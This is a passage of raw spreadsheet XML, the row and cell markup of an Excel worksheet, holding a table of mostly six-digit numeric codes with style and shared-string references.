    <row r="2" spans="1:5" ht="14.25" thickTop="1">
      <c r="A2" s="228"/>
      <c r="B2" s="229"/>
      <c r="C2" s="229"/>
      <c r="D2" s="229"/>
      <c r="E2" s="230"/>
    </row>
    <row r="3" spans="1:5" ht="13.5" customHeight="1">
      <c r="A3" s="231"/>
      <c r="B3" s="232"/>
      <c r="C3" s="232"/>
      <c r="D3" s="232"/>
      <c r="E3" s="233"/>
    </row>
    <row r="4" spans="1:9" ht="14.25" customHeight="1">
      <c r="A4" s="231"/>
      <c r="B4" s="232"/>
      <c r="C4" s="232"/>
      <c r="D4" s="232"/>
      <c r="E4" s="233"/>
      <c r="H4" s="44" t="s">
        <v>16</v>
      </c>
      <c r="I4" s="44"/>
    </row>
    <row r="5" spans="1:8" ht="13.5" customHeight="1" thickBot="1">
      <c r="A5" s="234"/>
      <c r="B5" s="235"/>
      <c r="C5" s="235"/>
      <c r="D5" s="235"/>
      <c r="E5" s="236"/>
      <c r="H5" s="45" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="6" ht="14.25" thickTop="1"/>
    <row r="7" ht="13.5">
      <c r="A7" s="46" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="8" ht="7.5" customHeight="1" thickBot="1"/>
    <row r="9" spans="1:9" s="45" customFormat="1" ht="15.75" customHeight="1" thickTop="1">
      <c r="A9" s="47" t="s">
        <v>18</v>
      </c>
      <c r="B9" s="237" t="s">
        <v>19</v>
      </c>
      <c r="C9" s="238"/>
      <c r="D9" s="239"/>
      <c r="E9" s="48" t="s">
        <v>20</v>
      </c>
      <c r="F9" s="49"/>
      <c r="G9" s="50" t="s">
        <v>21</v>
      </c>
      <c r="H9" s="50"/>
      <c r="I9" s="51"/>
    </row>
    <row r="10" spans="1:9" s="45" customFormat="1" ht="15.75" customHeight="1">
      <c r="A10" s="52" t="s">
        <v>22</v>
      </c>
      <c r="B10" s="240" t="s">
        <v>23</v>
      </c>
      <c r="C10" s="241"/>
      <c r="D10" s="53"/>
      <c r="E10" s="54" t="s">
        <v>24</v>
      </c>
      <c r="F10" s="55"/>
      <c r="G10" s="56" t="s">
        <v>25</v>
      </c>
      <c r="H10" s="56"/>
      <c r="I10" s="53"/>
    </row>
    <row r="11" spans="1:9" s="45" customFormat="1" ht="15.75" customHeight="1">
      <c r="A11" s="52" t="s">
        <v>26</v>
      </c>
      <c r="B11" s="56" t="s">
        <v>27</v>
      </c>
      <c r="C11" s="56"/>
      <c r="D11" s="53"/>
      <c r="E11" s="57" t="s">
        <v>28</v>
      </c>
      <c r="F11" s="58"/>
      <c r="G11" s="59" t="s">
        <v>29</v>
      </c>
      <c r="H11" s="59"/>
      <c r="I11" s="60"/>
    </row>
    <row r="12" spans="1:9" s="45" customFormat="1" ht="15.75" customHeight="1" thickBot="1">
      <c r="A12" s="61" t="s">
        <v>30</v>
      </c>
      <c r="B12" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C12" s="62"/>
      <c r="D12" s="63"/>
      <c r="E12" s="64" t="s">
        <v>31</v>
      </c>
      <c r="F12" s="65"/>
      <c r="G12" s="66" t="s">
        <v>93</v>
      </c>
      <c r="H12" s="66"/>
      <c r="I12" s="67"/>
    </row>
    <row r="13" ht="14.25" thickTop="1"/>
    <row r="14" ht="13.5">
      <c r="A14" s="46" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="15" ht="9.75" customHeight="1" thickBot="1"/>
    <row r="16" spans="1:9" ht="15.75" customHeight="1" thickTop="1">
      <c r="A16" s="17" t="s">
        <v>33</v>
      </c>
      <c r="B16" s="68" t="s">
        <v>34</v>
      </c>
      <c r="C16" s="69"/>
      <c r="D16" s="70"/>
      <c r="E16" s="70"/>
      <c r="F16" s="70"/>
      <c r="G16" s="70"/>
      <c r="H16" s="70"/>
      <c r="I16" s="71"/>
    </row>
    <row r="17" spans="1:9" ht="15.75" customHeight="1" thickBot="1">
      <c r="A17" s="18" t="s">
        <v>35</v>
      </c>
      <c r="B17" s="72" t="s">
        <v>36</v>
      </c>
      <c r="C17" s="73"/>
      <c r="D17" s="74"/>
      <c r="E17" s="74"/>
      <c r="F17" s="74"/>
      <c r="G17" s="74"/>
      <c r="H17" s="74"/>
      <c r="I17" s="75"/>
    </row>
    <row r="18" spans="1:9" ht="14.25" thickTop="1">
      <c r="A18" s="13"/>
      <c r="B18" s="13"/>
      <c r="C18" s="76"/>
      <c r="D18" s="76"/>
      <c r="E18" s="76"/>
      <c r="F18" s="76"/>
      <c r="G18" s="76"/>
      <c r="H18" s="76"/>
      <c r="I18" s="77"/>
    </row>
    <row r="19" spans="1:10" ht="13.5">
      <c r="A19" s="14"/>
      <c r="B19" s="145">
        <v>10</v>
      </c>
      <c r="C19" s="131">
        <v>356320</v>
      </c>
      <c r="D19" s="131">
        <v>403812</v>
      </c>
      <c r="E19" s="131">
        <v>407541</v>
      </c>
      <c r="F19" s="131">
        <v>4214</v>
      </c>
      <c r="G19" s="131">
        <v>448103</v>
      </c>
      <c r="H19" s="131">
        <v>461025</v>
      </c>
      <c r="I19" s="138">
        <v>490606</v>
      </c>
      <c r="J19" s="1"/>
    </row>
    <row r="20" spans="1:10" ht="13.5">
      <c r="A20" s="14"/>
      <c r="B20" s="145">
        <v>11</v>
      </c>
      <c r="C20" s="131">
        <v>356321</v>
      </c>
      <c r="D20" s="131">
        <v>403820</v>
      </c>
      <c r="E20" s="131">
        <v>407625</v>
      </c>
      <c r="F20" s="131">
        <v>421417</v>
      </c>
      <c r="G20" s="131">
        <v>448106</v>
      </c>
      <c r="H20" s="131">
        <v>461774</v>
      </c>
      <c r="I20" s="138">
        <v>490611</v>
      </c>
      <c r="J20" s="1"/>
    </row>
    <row r="21" spans="1:10" ht="13.5">
      <c r="A21" s="14"/>
      <c r="B21" s="145">
        <v>13</v>
      </c>
      <c r="C21" s="131">
        <v>356322</v>
      </c>
      <c r="D21" s="131">
        <v>403821</v>
      </c>
      <c r="E21" s="131">
        <v>407725</v>
      </c>
      <c r="F21" s="131">
        <v>421418</v>
      </c>
      <c r="G21" s="131">
        <v>448108</v>
      </c>
      <c r="H21" s="131">
        <v>461775</v>
      </c>
      <c r="I21" s="138">
        <v>490612</v>
      </c>
      <c r="J21" s="1"/>
    </row>
    <row r="22" spans="1:10" ht="13.5">
      <c r="A22" s="15"/>
      <c r="B22" s="145">
        <v>19</v>
      </c>
      <c r="C22" s="131">
        <v>356323</v>
      </c>
      <c r="D22" s="131">
        <v>403823</v>
      </c>
      <c r="E22" s="131">
        <v>408320</v>
      </c>
      <c r="F22" s="131">
        <v>421420</v>
      </c>
      <c r="G22" s="131">
        <v>448111</v>
      </c>
      <c r="H22" s="131">
        <v>462890</v>
      </c>
      <c r="I22" s="138">
        <v>490620</v>
      </c>
      <c r="J22" s="1"/>
    </row>
    <row r="23" spans="1:10" ht="13.5">
      <c r="A23" s="147" t="s">
        <v>37</v>
      </c>
      <c r="B23" s="145">
        <v>20</v>
      </c>
      <c r="C23" s="131">
        <v>356324</v>
      </c>
      <c r="D23" s="131">
        <v>403825</v>
      </c>
      <c r="E23" s="131">
        <v>409460</v>
      </c>
      <c r="F23" s="131">
        <v>421573</v>
      </c>
      <c r="G23" s="131">
        <v>448112</v>
      </c>
      <c r="H23" s="131">
        <v>465888</v>
      </c>
      <c r="I23" s="138">
        <v>490621</v>
      </c>
      <c r="J23" s="1"/>
    </row>
    <row r="24" spans="1:10" ht="13.5">
      <c r="A24" s="19"/>
      <c r="B24" s="145">
        <v>21</v>
      </c>
      <c r="C24" s="131">
        <v>356325</v>
      </c>
      <c r="D24" s="131">
        <v>403827</v>
      </c>
      <c r="E24" s="160">
        <v>410109</v>
      </c>
      <c r="F24" s="131">
        <v>421834</v>
      </c>
      <c r="G24" s="131">
        <v>448121</v>
      </c>
      <c r="H24" s="131">
        <v>465889</v>
      </c>
      <c r="I24" s="138">
        <v>490622</v>
      </c>
      <c r="J24" s="1"/>
    </row>
    <row r="25" spans="1:10" ht="13.5">
      <c r="A25" s="19" t="s">
        <v>38</v>
      </c>
      <c r="B25" s="145">
        <v>30</v>
      </c>
      <c r="C25" s="131">
        <v>356327</v>
      </c>
      <c r="D25" s="131">
        <v>403831</v>
      </c>
      <c r="E25" s="131">
        <v>410120</v>
      </c>
      <c r="F25" s="131">
        <v>422190</v>
      </c>
      <c r="G25" s="131">
        <v>448123</v>
      </c>
      <c r="H25" s="131">
        <v>469631</v>
      </c>
      <c r="I25" s="138">
        <v>490623</v>
      </c>
      <c r="J25" s="1"/>
    </row>
    <row r="26" spans="1:10" ht="13.5">
      <c r="A26" s="124"/>
      <c r="B26" s="145">
        <v>70</v>
      </c>
      <c r="C26" s="131">
        <v>356331</v>
      </c>
      <c r="D26" s="131">
        <v>403833</v>
      </c>
      <c r="E26" s="131">
        <v>410199</v>
      </c>
      <c r="F26" s="131">
        <v>422727</v>
      </c>
      <c r="G26" s="131">
        <v>448125</v>
      </c>
      <c r="H26" s="131">
        <v>469632</v>
      </c>
      <c r="I26" s="138">
        <v>490624</v>
      </c>
      <c r="J26" s="1"/>
    </row>
    <row r="27" spans="1:10" ht="13.5">
      <c r="A27" s="123" t="s">
        <v>88</v>
      </c>
      <c r="B27" s="145">
        <v>73</v>
      </c>
      <c r="C27" s="131">
        <v>356332</v>
      </c>
      <c r="D27" s="131">
        <v>403839</v>
      </c>
      <c r="E27" s="131">
        <v>410278</v>
      </c>
      <c r="F27" s="131">
        <v>425920</v>
      </c>
      <c r="G27" s="131">
        <v>448127</v>
      </c>
      <c r="H27" s="131">
        <v>469639</v>
      </c>
      <c r="I27" s="138">
        <v>490625</v>
      </c>
      <c r="J27" s="1"/>
    </row>
    <row r="28" spans="1:10" ht="13.5">
      <c r="A28" s="123" t="s">
        <v>81</v>
      </c>
      <c r="B28" s="145">
        <v>90</v>
      </c>
      <c r="C28" s="131">
        <v>356333</v>
      </c>
      <c r="D28" s="131">
        <v>404331</v>
      </c>
      <c r="E28" s="131">
        <v>411178</v>
      </c>
      <c r="F28" s="131">
        <v>426589</v>
      </c>
      <c r="G28" s="131">
        <v>448131</v>
      </c>
      <c r="H28" s="131">
        <v>474360</v>
      </c>
      <c r="I28" s="138">
        <v>490627</v>
      </c>
      <c r="J28" s="1"/>
    </row>
    <row r="29" spans="1:10" ht="13.5">
      <c r="A29" s="123" t="s">
        <v>82</v>
      </c>
      <c r="B29" s="145">
        <v>91</v>
      </c>
      <c r="C29" s="131">
        <v>356336</v>
      </c>
      <c r="D29" s="131">
        <v>404332</v>
      </c>
      <c r="E29" s="131">
        <v>411478</v>
      </c>
      <c r="F29" s="131">
        <v>426920</v>
      </c>
      <c r="G29" s="131">
        <v>448133</v>
      </c>
      <c r="H29" s="131">
        <v>474361</v>
      </c>
      <c r="I29" s="138">
        <v>490631</v>
      </c>
      <c r="J29" s="1"/>
    </row>
    <row r="30" spans="1:10" ht="13.5">
      <c r="A30" s="123" t="s">
        <v>83</v>
      </c>
      <c r="B30" s="145">
        <v>93</v>
      </c>
      <c r="C30" s="131">
        <v>356339</v>
      </c>
      <c r="D30" s="131">
        <v>404336</v>
      </c>
      <c r="E30" s="131">
        <v>411825</v>
      </c>
      <c r="F30" s="131">
        <v>427120</v>
      </c>
      <c r="G30" s="131">
        <v>448139</v>
      </c>
      <c r="H30" s="131">
        <v>474420</v>
      </c>
      <c r="I30" s="138">
        <v>490632</v>
      </c>
      <c r="J30" s="1"/>
    </row>
    <row r="31" spans="1:10" ht="13.5">
      <c r="A31" s="123" t="s">
        <v>84</v>
      </c>
      <c r="B31" s="145">
        <v>220</v>
      </c>
      <c r="C31" s="131">
        <v>356503</v>
      </c>
      <c r="D31" s="131">
        <v>404339</v>
      </c>
      <c r="E31" s="131">
        <v>413625</v>
      </c>
      <c r="F31" s="131">
        <v>427203</v>
      </c>
      <c r="G31" s="131">
        <v>448195</v>
      </c>
      <c r="H31" s="131">
        <v>4755</v>
      </c>
      <c r="I31" s="138">
        <v>490636</v>
      </c>
      <c r="J31" s="1"/>
    </row>
    <row r="32" spans="1:10" ht="13.5">
      <c r="A32" s="123" t="s">
        <v>85</v>
      </c>
      <c r="B32" s="145">
        <v>221</v>
      </c>
      <c r="C32" s="131">
        <v>356506</v>
      </c>
      <c r="D32" s="131">
        <v>404678</v>
      </c>
      <c r="E32" s="131">
        <v>4140</v>
      </c>
      <c r="F32" s="131">
        <v>427206</v>
      </c>
      <c r="G32" s="131">
        <v>448492</v>
      </c>
      <c r="H32" s="131">
        <v>475503</v>
      </c>
      <c r="I32" s="138">
        <v>490639</v>
      </c>
      <c r="J32" s="1"/>
    </row>
    <row r="33" spans="1:10" ht="13.5">
      <c r="A33" s="123" t="s">
        <v>86</v>
      </c>
      <c r="B33" s="145">
        <v>223</v>
      </c>
      <c r="C33" s="131">
        <v>356511</v>
      </c>
      <c r="D33" s="131">
        <v>404720</v>
      </c>
      <c r="E33" s="131">
        <v>414003</v>
      </c>
      <c r="F33" s="131">
        <v>427211</v>
      </c>
      <c r="G33" s="131">
        <v>450025</v>
      </c>
      <c r="H33" s="131">
        <v>475506</v>
      </c>
      <c r="I33" s="138">
        <v>491217</v>
      </c>
      <c r="J33" s="1"/>
    </row>
    <row r="34" spans="1:10" ht="13.5">
      <c r="A34" s="123" t="s">
        <v>87</v>
      </c>
      <c r="B34" s="145">
        <v>224</v>
      </c>
      <c r="C34" s="131">
        <v>356512</v>
      </c>
      <c r="D34" s="131">
        <v>4048</v>
      </c>
      <c r="E34" s="131">
        <v>414006</v>
      </c>
      <c r="F34" s="131">
        <v>427220</v>
      </c>
      <c r="G34" s="131">
        <v>453934</v>
      </c>
      <c r="H34" s="131">
        <v>475511</v>
      </c>
      <c r="I34" s="138">
        <v>491218</v>
      </c>
      <c r="J34" s="1"/>
    </row>
    <row r="35" spans="1:10" ht="13.5">
      <c r="A35" s="19"/>
      <c r="B35" s="145">
        <v>227</v>
      </c>
      <c r="C35" s="131">
        <v>356520</v>
      </c>
      <c r="D35" s="131">
        <v>404803</v>
      </c>
      <c r="E35" s="131">
        <v>414011</v>
      </c>
      <c r="F35" s="131">
        <v>427225</v>
      </c>
      <c r="G35" s="131">
        <v>453936</v>
      </c>
      <c r="H35" s="131">
        <v>475512</v>
      </c>
      <c r="I35" s="138">
        <v>496603</v>
      </c>
      <c r="J35" s="1"/>
    </row>
    <row r="36" spans="1:10" ht="13.5">
      <c r="A36" s="15"/>
      <c r="B36" s="145">
        <v>228</v>
      </c>
      <c r="C36" s="131">
        <v>356521</v>
      </c>
      <c r="D36" s="131">
        <v>404806</v>
      </c>
      <c r="E36" s="131">
        <v>414012</v>
      </c>
      <c r="F36" s="131">
        <v>427231</v>
      </c>
      <c r="G36" s="131">
        <v>4553</v>
      </c>
      <c r="H36" s="131">
        <v>475520</v>
      </c>
      <c r="I36" s="138">
        <v>498411</v>
      </c>
      <c r="J36" s="1"/>
    </row>
    <row r="37" spans="1:10" ht="13.5">
      <c r="A37" s="15"/>
      <c r="B37" s="145">
        <v>229</v>
      </c>
      <c r="C37" s="131">
        <v>356523</v>
      </c>
      <c r="D37" s="131">
        <v>404811</v>
      </c>
      <c r="E37" s="131">
        <v>414020</v>
      </c>
      <c r="F37" s="131">
        <v>427232</v>
      </c>
      <c r="G37" s="131">
        <v>455303</v>
      </c>
      <c r="H37" s="131">
        <v>475521</v>
      </c>
      <c r="I37" s="138">
        <v>498412</v>
      </c>
      <c r="J37" s="1"/>
    </row>
    <row r="38" spans="1:10" ht="13.5">
      <c r="A38" s="15"/>
      <c r="B38" s="145">
        <v>3560</v>
      </c>
      <c r="C38" s="131">
        <v>356525</v>
      </c>
      <c r="D38" s="131">
        <v>404812</v>
      </c>
      <c r="E38" s="131">
        <v>414021</v>
      </c>
      <c r="F38" s="131">
        <v>427250</v>
      </c>
      <c r="G38" s="131">
        <v>455306</v>
      </c>
      <c r="H38" s="131">
        <v>475523</v>
      </c>
      <c r="I38" s="138">
        <v>498703</v>
      </c>
      <c r="J38" s="1"/>
    </row>
    <row r="39" spans="1:16" ht="13.5">
      <c r="A39" s="15"/>
      <c r="B39" s="146">
        <v>3563</v>
      </c>
      <c r="C39" s="131">
        <v>356527</v>
      </c>
      <c r="D39" s="131">
        <v>404820</v>
      </c>
      <c r="E39" s="131">
        <v>414022</v>
      </c>
      <c r="F39" s="131">
        <v>428411</v>
      </c>
      <c r="G39" s="131">
        <v>455311</v>
      </c>
      <c r="H39" s="131">
        <v>475525</v>
      </c>
      <c r="I39" s="138">
        <v>514020</v>
      </c>
      <c r="J39" s="1"/>
      <c r="K39" s="43"/>
      <c r="L39" s="43"/>
      <c r="M39" s="43"/>
      <c r="N39" s="1"/>
      <c r="O39" s="43"/>
      <c r="P39" s="43"/>
    </row>
    <row r="40" spans="1:14" ht="13.5">
      <c r="A40" s="15"/>
      <c r="B40" s="145">
        <v>356003</v>
      </c>
      <c r="C40" s="131">
        <v>356531</v>
      </c>
      <c r="D40" s="131">
        <v>404821</v>
      </c>
      <c r="E40" s="131">
        <v>414023</v>
      </c>
      <c r="F40" s="131">
        <v>428412</v>
      </c>
      <c r="G40" s="131">
        <v>455312</v>
      </c>
      <c r="H40" s="131">
        <v>475527</v>
      </c>
      <c r="I40" s="138">
        <v>514876</v>
      </c>
      <c r="J40" s="1"/>
      <c r="K40" s="43"/>
      <c r="M40" s="43"/>
      <c r="N40" s="1"/>
    </row>
    <row r="41" spans="1:14" ht="13.5">
      <c r="A41" s="15"/>
      <c r="B41" s="145">
        <v>356006</v>
      </c>
      <c r="C41" s="131">
        <v>356532</v>
      </c>
      <c r="D41" s="131">
        <v>404823</v>
      </c>
      <c r="E41" s="131">
        <v>414024</v>
      </c>
      <c r="F41" s="131">
        <v>428431</v>
      </c>
      <c r="G41" s="131">
        <v>455320</v>
      </c>
      <c r="H41" s="131">
        <v>475531</v>
      </c>
      <c r="I41" s="138">
        <v>516078</v>
      </c>
      <c r="J41" s="1"/>
      <c r="N41" s="1"/>
    </row>
    <row r="42" spans="1:14" ht="13.5">
      <c r="A42" s="15"/>
      <c r="B42" s="145">
        <v>356011</v>
      </c>
      <c r="C42" s="131">
        <v>356533</v>
      </c>
      <c r="D42" s="131">
        <v>404824</v>
      </c>
      <c r="E42" s="131">
        <v>414025</v>
      </c>
      <c r="F42" s="131">
        <v>428432</v>
      </c>
      <c r="G42" s="131">
        <v>455321</v>
      </c>
      <c r="H42" s="131">
        <v>475532</v>
      </c>
      <c r="I42" s="138">
        <v>518420</v>
      </c>
      <c r="J42" s="1"/>
      <c r="N42" s="80"/>
    </row>
    <row r="43" spans="1:10" ht="13.5">
      <c r="A43" s="15"/>
      <c r="B43" s="145">
        <v>356012</v>
      </c>
      <c r="C43" s="131">
        <v>356539</v>
      </c>
      <c r="D43" s="131">
        <v>404825</v>
      </c>
      <c r="E43" s="131">
        <v>414027</v>
      </c>
      <c r="F43" s="131">
        <v>428439</v>
      </c>
      <c r="G43" s="131">
        <v>455322</v>
      </c>
      <c r="H43" s="131">
        <v>475533</v>
      </c>
      <c r="I43" s="138">
        <v>524144</v>
      </c>
      <c r="J43" s="1"/>
    </row>
    <row r="44" spans="1:10" ht="13.5">
      <c r="A44" s="15"/>
      <c r="B44" s="145">
        <v>356020</v>
      </c>
      <c r="C44" s="131">
        <v>356820</v>
      </c>
      <c r="D44" s="131">
        <v>404827</v>
      </c>
      <c r="E44" s="131">
        <v>414031</v>
      </c>
      <c r="F44" s="131">
        <v>430603</v>
      </c>
      <c r="G44" s="131">
        <v>455323</v>
      </c>
      <c r="H44" s="131">
        <v>475539</v>
      </c>
      <c r="I44" s="138">
        <v>524220</v>
      </c>
      <c r="J44" s="1"/>
    </row>
    <row r="45" spans="1:10" ht="13.5">
      <c r="A45" s="15"/>
      <c r="B45" s="145">
        <v>356021</v>
      </c>
      <c r="C45" s="131">
        <v>356878</v>
      </c>
      <c r="D45" s="131">
        <v>405203</v>
      </c>
      <c r="E45" s="131">
        <v>414032</v>
      </c>
      <c r="F45" s="131">
        <v>432445</v>
      </c>
      <c r="G45" s="131">
        <v>455324</v>
      </c>
      <c r="H45" s="131">
        <v>480451</v>
      </c>
      <c r="I45" s="138">
        <v>524223</v>
      </c>
      <c r="J45" s="1"/>
    </row>
    <row r="46" spans="1:10" ht="13.5">
      <c r="A46" s="15"/>
      <c r="B46" s="145">
        <v>356022</v>
      </c>
      <c r="C46" s="131">
        <v>356920</v>
      </c>
      <c r="D46" s="209">
        <v>405207</v>
      </c>
      <c r="E46" s="131">
        <v>414039</v>
      </c>
      <c r="F46" s="131">
        <v>434346</v>
      </c>
      <c r="G46" s="131">
        <v>455325</v>
      </c>
      <c r="H46" s="131">
        <v>485903</v>
      </c>
      <c r="I46" s="138">
        <v>526878</v>
      </c>
      <c r="J46" s="1"/>
    </row>
    <row r="47" spans="1:10" ht="13.5">
      <c r="A47" s="15"/>
      <c r="B47" s="145">
        <v>356023</v>
      </c>
      <c r="C47" s="131">
        <v>356978</v>
      </c>
      <c r="D47" s="131">
        <v>405220</v>
      </c>
      <c r="E47" s="131">
        <v>414625</v>
      </c>
      <c r="F47" s="131">
        <v>434347</v>
      </c>
      <c r="G47" s="131">
        <v>455327</v>
      </c>
      <c r="H47" s="131">
        <v>485906</v>
      </c>
      <c r="I47" s="138">
        <v>530432</v>
      </c>
      <c r="J47" s="1"/>
    </row>
    <row r="48" spans="1:10" ht="13.5">
      <c r="A48" s="15"/>
      <c r="B48" s="145">
        <v>356024</v>
      </c>
      <c r="C48" s="131">
        <v>356979</v>
      </c>
      <c r="D48" s="131">
        <v>406005</v>
      </c>
      <c r="E48" s="131">
        <v>415525</v>
      </c>
      <c r="F48" s="131">
        <v>436525</v>
      </c>
      <c r="G48" s="131">
        <v>455331</v>
      </c>
      <c r="H48" s="131">
        <v>485920</v>
      </c>
      <c r="I48" s="138">
        <v>533032</v>
      </c>
      <c r="J48" s="1"/>
    </row>
    <row r="49" spans="1:10" ht="13.5">
      <c r="A49" s="15"/>
      <c r="B49" s="145">
        <v>356025</v>
      </c>
      <c r="C49" s="131">
        <v>400223</v>
      </c>
      <c r="D49" s="131">
        <v>406078</v>
      </c>
      <c r="E49" s="131">
        <v>4211</v>
      </c>
      <c r="F49" s="131">
        <v>438674</v>
      </c>
      <c r="G49" s="131">
        <v>455332</v>
      </c>
      <c r="H49" s="131">
        <v>485925</v>
      </c>
      <c r="I49" s="143"/>
      <c r="J49" s="1"/>
    </row>
    <row r="50" spans="1:10" ht="13.5">
      <c r="A50" s="15"/>
      <c r="B50" s="145">
        <v>356027</v>
      </c>
      <c r="C50" s="131">
        <v>400278</v>
      </c>
      <c r="D50" s="131">
        <v>406357</v>
      </c>
      <c r="E50" s="131">
        <v>421103</v>
      </c>
      <c r="F50" s="131">
        <v>438922</v>
      </c>
      <c r="G50" s="131">
        <v>455336</v>
      </c>
      <c r="H50" s="131">
        <v>485927</v>
      </c>
      <c r="I50" s="143"/>
      <c r="J50" s="1"/>
    </row>
    <row r="51" spans="1:10" ht="13.5">
      <c r="A51" s="15"/>
      <c r="B51" s="145">
        <v>356031</v>
      </c>
      <c r="C51" s="131">
        <v>401120</v>
      </c>
      <c r="D51" s="131">
        <v>406703</v>
      </c>
      <c r="E51" s="131">
        <v>421106</v>
      </c>
      <c r="F51" s="131">
        <v>439110</v>
      </c>
      <c r="G51" s="131">
        <v>455339</v>
      </c>
      <c r="H51" s="131">
        <v>486578</v>
      </c>
      <c r="I51" s="143"/>
      <c r="J51" s="1"/>
    </row>
    <row r="52" spans="1:10" ht="13.5">
      <c r="A52" s="15"/>
      <c r="B52" s="145">
        <v>356032</v>
      </c>
      <c r="C52" s="131">
        <v>401278</v>
      </c>
      <c r="D52" s="131">
        <v>406706</v>
      </c>
      <c r="E52" s="131">
        <v>421111</v>
      </c>
      <c r="F52" s="131">
        <v>440025</v>
      </c>
      <c r="G52" s="131">
        <v>455420</v>
      </c>
      <c r="H52" s="131">
        <v>486579</v>
      </c>
      <c r="I52" s="143"/>
      <c r="J52" s="1"/>
    </row>
    <row r="53" spans="1:10" ht="13.5">
      <c r="A53" s="15"/>
      <c r="B53" s="145">
        <v>356033</v>
      </c>
      <c r="C53" s="131">
        <v>401678</v>
      </c>
      <c r="D53" s="131">
        <v>406711</v>
      </c>
      <c r="E53" s="131">
        <v>421112</v>
      </c>
      <c r="F53" s="131">
        <v>440445</v>
      </c>
      <c r="G53" s="131">
        <v>456037</v>
      </c>
      <c r="H53" s="131">
        <v>486678</v>
      </c>
      <c r="I53" s="143"/>
      <c r="J53" s="1"/>
    </row>
    <row r="54" spans="1:10" ht="13.5">
      <c r="A54" s="15"/>
      <c r="B54" s="145">
        <v>356036</v>
      </c>
      <c r="C54" s="131">
        <v>402359</v>
      </c>
      <c r="D54" s="131">
        <v>406720</v>
      </c>
      <c r="E54" s="131">
        <v>421120</v>
      </c>
      <c r="F54" s="131">
        <v>440446</v>
      </c>
      <c r="G54" s="131">
        <v>456058</v>
      </c>
      <c r="H54" s="131">
        <v>486679</v>
      </c>
      <c r="I54" s="143"/>
      <c r="J54" s="1"/>
    </row>
    <row r="55" spans="1:18" ht="13.5">
      <c r="A55" s="15"/>
      <c r="B55" s="145">
        <v>356039</v>
      </c>
      <c r="C55" s="131">
        <v>403346</v>
      </c>
      <c r="D55" s="131">
        <v>406723</v>
      </c>
      <c r="E55" s="131">
        <v>421121</v>
      </c>
      <c r="F55" s="131">
        <v>440447</v>
      </c>
      <c r="G55" s="131">
        <v>456702</v>
      </c>
      <c r="H55" s="131">
        <v>490011</v>
      </c>
      <c r="I55" s="143"/>
      <c r="J55" s="1"/>
      <c r="L55" s="45"/>
      <c r="O55" s="45"/>
      <c r="P55" s="45"/>
      <c r="Q55" s="45"/>
      <c r="R55" s="45"/>
    </row>
    <row r="56" spans="1:18" ht="13.5">
      <c r="A56" s="15"/>
      <c r="B56" s="145">
        <v>3563</v>
      </c>
      <c r="C56" s="131">
        <v>403725</v>
      </c>
      <c r="D56" s="131">
        <v>406725</v>
      </c>
      <c r="E56" s="131">
        <v>421123</v>
      </c>
      <c r="F56" s="131">
        <v>440448</v>
      </c>
      <c r="G56" s="131">
        <v>456703</v>
      </c>
      <c r="H56" s="131">
        <v>490012</v>
      </c>
      <c r="I56" s="143"/>
      <c r="J56" s="1"/>
      <c r="K56" s="45"/>
      <c r="L56" s="45"/>
      <c r="M56" s="45"/>
      <c r="O56" s="45"/>
      <c r="P56" s="45"/>
      <c r="Q56" s="45"/>
      <c r="R56" s="45"/>
    </row>
    <row r="57" spans="1:14" ht="13.5">
      <c r="A57" s="15"/>
      <c r="B57" s="145">
        <v>356303</v>
      </c>
      <c r="C57" s="131">
        <v>4038</v>
      </c>
      <c r="D57" s="131">
        <v>406727</v>
      </c>
      <c r="E57" s="131">
        <v>421127</v>
      </c>
      <c r="F57" s="131">
        <v>447320</v>
      </c>
      <c r="G57" s="131">
        <v>459902</v>
      </c>
      <c r="H57" s="131">
        <v>490020</v>
      </c>
      <c r="I57" s="143"/>
      <c r="J57" s="1"/>
      <c r="K57" s="45"/>
      <c r="M57" s="45"/>
      <c r="N57" s="45"/>
    </row>
    <row r="58" spans="1:14" ht="13.5">
      <c r="A58" s="15"/>
      <c r="B58" s="145">
        <v>356306</v>
      </c>
      <c r="C58" s="131">
        <v>403803</v>
      </c>
      <c r="D58" s="131">
        <v>406731</v>
      </c>
      <c r="E58" s="131">
        <v>421131</v>
      </c>
      <c r="F58" s="131">
        <v>447781</v>
      </c>
      <c r="G58" s="131">
        <v>459903</v>
      </c>
      <c r="H58" s="131">
        <v>490220</v>
      </c>
      <c r="I58" s="144"/>
      <c r="J58" s="1"/>
      <c r="N58" s="45"/>
    </row>
    <row r="59" spans="1:10" ht="13.5">
      <c r="A59" s="15"/>
      <c r="B59" s="145">
        <v>356311</v>
      </c>
      <c r="C59" s="131">
        <v>403806</v>
      </c>
      <c r="D59" s="131">
        <v>406732</v>
      </c>
      <c r="E59" s="131">
        <v>421132</v>
      </c>
      <c r="F59" s="131">
        <v>447820</v>
      </c>
      <c r="G59" s="131">
        <v>459952</v>
      </c>
      <c r="H59" s="131">
        <v>4906</v>
      </c>
      <c r="I59" s="143"/>
      <c r="J59" s="1"/>
    </row>
    <row r="60" spans="1:10" ht="13.5">
      <c r="A60" s="15"/>
      <c r="B60" s="145">
        <v>356312</v>
      </c>
      <c r="C60" s="131">
        <v>403811</v>
      </c>
      <c r="D60" s="131">
        <v>406733</v>
      </c>
      <c r="E60" s="131">
        <v>421139</v>
      </c>
      <c r="F60" s="131">
        <v>4481</v>
      </c>
      <c r="G60" s="131">
        <v>459953</v>
      </c>
      <c r="H60" s="131">
        <v>490603</v>
      </c>
      <c r="I60" s="143"/>
      <c r="J60" s="1"/>
    </row>
    <row r="61" spans="1:10" ht="14.25" thickBot="1">
      <c r="A61" s="15"/>
      <c r="B61" s="148"/>
      <c r="C61" s="149"/>
      <c r="D61" s="179">
        <v>406739</v>
      </c>
      <c r="E61" s="150"/>
      <c r="F61" s="151"/>
      <c r="G61" s="150"/>
      <c r="H61" s="150"/>
      <c r="I61" s="152"/>
      <c r="J61" s="1"/>
    </row>
    <row r="62" spans="1:10" ht="9" customHeight="1" thickTop="1">
      <c r="A62" s="4"/>
      <c r="B62" s="78"/>
      <c r="C62" s="78"/>
      <c r="D62" s="78"/>
      <c r="E62" s="79"/>
      <c r="F62" s="39"/>
      <c r="G62" s="78"/>
      <c r="H62" s="78"/>
      <c r="I62" s="40"/>
      <c r="J62" s="1"/>
    </row>
    <row r="63" spans="1:9" ht="13.5">
      <c r="A63" s="14"/>
      <c r="B63" s="81"/>
      <c r="C63" s="82"/>
      <c r="D63" s="82"/>
      <c r="E63" s="82"/>
      <c r="F63" s="82"/>
